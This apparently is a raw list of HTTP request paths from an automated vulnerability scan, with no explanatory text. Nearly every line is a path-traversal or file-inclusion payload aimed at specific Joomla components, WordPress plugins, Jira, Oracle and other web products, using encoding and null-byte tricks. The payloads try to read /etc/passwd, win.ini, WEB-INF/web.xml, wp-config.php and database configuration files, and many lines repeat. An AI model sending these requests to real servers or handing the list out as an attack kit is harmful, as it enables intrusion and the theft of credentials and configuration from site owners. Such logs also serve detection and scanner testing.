/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/web/../../../..//etc/passwd
/web
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/web/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/web/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/loginLess/../../etc/passwd
/web/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/compress.php?file=../../../../../../../etc/passwd
/web/maint/index.php?packages
/web/download.do?file=../../../../config.text
/web/fileDownload?action=downloadBackupFile
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/druid/indexer/v1/sampler?for=connect
/web/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/web/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/web/images/..%2finfo.html
/web/
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/sys/ui/extend/varkind/custom.jsp
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/web/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/web/img/../../../../../../etc/passwd
/web/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/web/
/web/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/sys/ui/extend/varkind/custom.jsp
/web/loginLess/../../etc/passwd
/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/web/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/web/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/web
/web/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/web/compress.php?file=../../../../../../../etc/passwd
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/maint/index.php?packages
/web/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/download.do?file=../../../../config.text
/web/../../../..//etc/passwd
/web/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/web/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/web/index.php?page_slug=../../../../../etc/passwd%00
/web/img/../../../../../../etc/passwd
/web/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/web/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/web/sys/ui/extend/varkind/custom.jsp
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/catalog.php?filename=../../../../../../../../../etc/passwd
/web/fw/mindex.do?url=./WEB-INF/web.xml%3f
/web/fileDownload?action=downloadBackupFile
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/web/index.php?page_slug=../../../../../etc/passwd%00
/web/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/web/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei
/web/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/css_parser.php?css=css_parser.php
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/api/geojson?url=file:///etc/passwd
/web/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/catalog.php?filename=../../../../../../../../../etc/passwd
/web/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/web/index.php?page=/etc/passwd%00
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/web/fileDownload?action=downloadBackupFile
/web/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/web/eam/vib?id=/etc/issue
/web/_next/static/../server/pages-manifest.json
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/fileDownload?action=downloadBackupFile
/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/web/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/web/download?type=files&filename=../../../../../../../../etc/passwd
/web/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/web/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/web/index.php?s=Admin-Data-down&id=../../Conf/config.php
/web/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/web/etc/passwd
/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/web/css_parser.php?css=css_parser.php
/web/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/api/geojson?url=file:///etc/passwd
/web/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/web/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web/index.php?page=/etc/passwd%00
/web/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/web/_next/static/../server/pages-manifest.json
/web/eam/vib?id=/etc/issue
/web/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/web/fileDownload?action=downloadBackupFile
/web/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?s=Admin-Data-down&id=../../Conf/config.php
/web/solr/admin/cores?wt=json
/web/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/web/msa/../../../../../../../../etc/passwd
/web/./../../../../../../../../../../windows/win.ini
/web/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/web/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
\..\..\..\..\Windows\win.ini
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?class=../../../../../../../etc/passwd%00
/web/interlib/report/ShowImage?localPath=etc/passwd
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/../../../../../../etc/passwd
/web/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/web/?aam-media=wp-config.php
/web/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
/web/msa/../../../../../../../../etc/passwd
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/solr/admin/cores?wt=json
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/web/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/../../etc/passwd
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/./../../../../../../../../../../windows/win.ini
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/web/pandora_console/ajax.php?page=../../../../../../etc/passwd
/web/s/25SmlC6IrYR8wkOrNsotmEXEbQW/_/;/WEB-INF/web.xml
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/js/../../../../../../../../etc/passwd%00.jpg
/web/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
/web/public/index.php/home/file/user_pics
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/web/_next/../../../../../../../../../../etc/passwd
/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/web/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/?a=display&templateFile=README.md
/web/ispirit/interface/gateway.php
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/web/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/web/index.php/Home/uploadify/fileList?type=.+&path=../../../
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/web/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/pandora_console/ajax.php?page=../../../../../../etc/passwd
/web/s/25SmlC6IrYR8wkOrNsotmEXEbQW/_/;/WEB-INF/web.xml
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/js/../../../../../../../../etc/passwd%00.jpg
/web/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/comm.php?id=../../../../../../../../../../etc/passwd
/web/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/web/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/web/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/web/public/index.php/home/file/user_pics
/web/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/web/ispirit/interface/gateway.php
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/web/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/rest/tinymce/1/macro/preview
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/s/25Sml3BPRozBhbnVa6uGBiJaOAl/_/;/WEB-INF/web.xml
/web/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/web/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/web/?layout=/etc/passwd
/web///////../../../etc/passwd
/web/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/web/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/web/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/web/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/?c=../../../../../../etc/passwd%00
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/web/rest/tinymce/1/macro/preview
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/web/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
/web/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/web/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/web/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web/phpwiki/index.php/passwd
/web/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/./../../../../../../../../../../etc/passwd
/web/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/fmangersub?cpath=../../../../../../../etc/passwd
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/web///////../../../etc/passwd
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/static///////../../../../etc/passwd
/web/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/web/download.php?file=../../../../../etc/passwd
/web/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/jars/upload
/web/index.php?sl=../../../../../../../etc/passwd%00
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/web/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/web/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
